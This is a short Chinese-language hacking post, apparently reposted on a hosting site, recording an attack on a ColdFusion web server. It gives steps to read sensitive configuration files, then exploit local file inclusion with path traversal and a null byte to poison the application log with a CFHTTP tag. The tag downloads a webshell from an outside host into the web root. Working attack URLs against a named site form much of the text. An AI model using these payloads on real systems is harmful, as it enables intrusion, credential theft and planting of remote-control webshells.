鸿 网 互 联 www.68idc.cn

利用本地漏洞的攻击

来源:互联网 作者:佚名 时间:2015-08-10 06:55
1.读取metabase.xml/web.xml /password.properities敏感文件,得知www路径,coldfusion路径,coldfusion后台加密密码 2. 本地 包含coldfusion日志,写cfm一句话,得到WEBSHELL http://www.ypt.com/index.cfm?action=../../../../../../../../../../CFusionMX7/log
  

1.读取metabase.xml/web.xml /password.properities敏感文件,得知www路径,coldfusion路径,coldfusion后台加密密码


2.本地包含coldfusion日志,写cfm一句话,得到WEBSHELL

http://www.ypt.com/index.cfm?action=../../../../../../../../../../CFusionMX7/logs/application.log%00

http://www.ypt.com/index.cfm?action=<CFHTTP METHOD=Get URL=#URL.u# PATH=#URL.p# FILE=#URL.f#>

http://www.ypt.com/index.cfm?action=..\..\..\CFusionMX7\logs\application.log%00&u=http://www.pentest.cc/shell.txt&p=c:\inetpub\wwwroot\&f=shell.cfm


成功条件:

1.WEB目录可写

2.coldfusion目录和web目录在同一个分区

3.多个牛人的群策群力

未解决的问题:

1.iis的日志会把空格变成+,不知道怎么绕过

2.coldfusion会把单引号和双引号加倍处理,不知道怎么绕过去(师傅也遇到这个问题了,哈哈)

主要还是月月搞的,我只是做个记录,怕忘了.

网友评论
<